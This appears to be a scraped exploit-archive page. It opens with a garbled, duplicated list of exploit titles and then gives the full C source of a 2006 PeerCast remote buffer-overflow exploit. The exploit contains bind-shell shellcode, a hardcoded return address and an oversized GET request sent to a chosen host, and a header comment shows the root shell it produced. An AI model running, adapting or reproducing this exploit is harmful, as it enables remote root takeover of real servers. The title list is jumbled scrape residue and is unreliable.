
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
134 lines
3.3 KiB
C
Executable file
134 lines
3.3 KiB
C
Executable file
/*
|
|
\ PeerCast <=0.1216 remote exploit
|
|
/ by Darkeagle
|
|
\
|
|
/ 09.03.06
|
|
\
|
|
/
|
|
\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz.
|
|
/
|
|
\
|
|
/ http://unl0ck.net
|
|
|
|
*******************************************
|
|
root@localhost darkeagle]# telnet localhost 36864
|
|
Trying 127.0.0.1...
|
|
Connected to localhost (127.0.0.1).
|
|
Escape character is '^]'.
|
|
id;
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
: command not found
|
|
uname -a;
|
|
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
|
|
: command not found
|
|
*******************************************
|
|
|
|
Special tnx goes to: Dr_UF0 for targets support :)
|
|
|
|
\
|
|
/
|
|
\
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netdb.h>
|
|
#include <arpa/inet.h>
|
|
#include <unistd.h>
|
|
|
|
|
|
char scode[]= // binds 4444 port
|
|
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
|
|
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
|
|
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
|
|
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
|
|
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
|
|
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
|
|
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
|
|
|
|
char linuxshellcode[]= // binds 36864 port
|
|
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
|
|
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
|
|
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
|
|
"\x80\x43\xc6\x46\x10\x10\x88\x46"
|
|
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
|
|
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
|
|
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
|
|
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
|
|
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
|
|
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
|
|
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
|
|
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
|
|
"\x80\x88\x56\x07\x89\x76\x0c\x87"
|
|
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
|
|
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
|
|
"\x6e\x2f\x73\x68";
|
|
|
|
|
|
|
|
void usage(char *proga)
|
|
{
|
|
printf("usage> %s <ipaddr> <port>\n", proga);
|
|
}
|
|
|
|
int main( int argc, char *argv[] )
|
|
{
|
|
int sock;
|
|
struct sockaddr_in addr;
|
|
char evil[1024], get[1024];
|
|
|
|
long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz
|
|
|
|
|
|
system("clear");
|
|
printf(".::: PeerCast <= 0.1215 remote exploit :::.\n");
|
|
printf(" by Darkeagle \n\n");
|
|
printf(" bug founder: Leon Juranic\n");
|
|
printf("\n keep private!!!\n");
|
|
|
|
if ( argc < 3 )
|
|
{
|
|
usage(argv[0]);
|
|
exit(0);
|
|
}
|
|
|
|
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
|
|
|
|
addr.sin_family = AF_INET;
|
|
addr.sin_port = htons(atoi(argv[2]));
|
|
addr.sin_addr.s_addr = inet_addr(argv[1]);
|
|
|
|
printf("\nexp> connecting...\n");
|
|
|
|
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 )
|
|
{
|
|
printf("exp> connection failed\n");
|
|
exit(0);
|
|
}
|
|
|
|
printf("exp> connection enstabilished!\n");
|
|
|
|
memset(evil, 0x00, 1024);
|
|
memset(get, 0x00, 1024);
|
|
memset(evil, 0x55, 800);
|
|
//memcpy(evil+strlen(evil), &scode, sizeof(scode));
|
|
memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode));
|
|
|
|
strcpy(get, "GET /stream/?");
|
|
|
|
*(long*)&evil[780] = retaddr;
|
|
strcat(evil, "\r\n\r\n");
|
|
strcat(get, evil);
|
|
|
|
sleep(1);
|
|
printf("exp> sending evil data\n");
|
|
send(sock, get, strlen(get), 0);
|
|
printf("exp> done!\n");
|
|
printf("exp> check shell\n");
|
|
close(sock);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2006-03-12]
|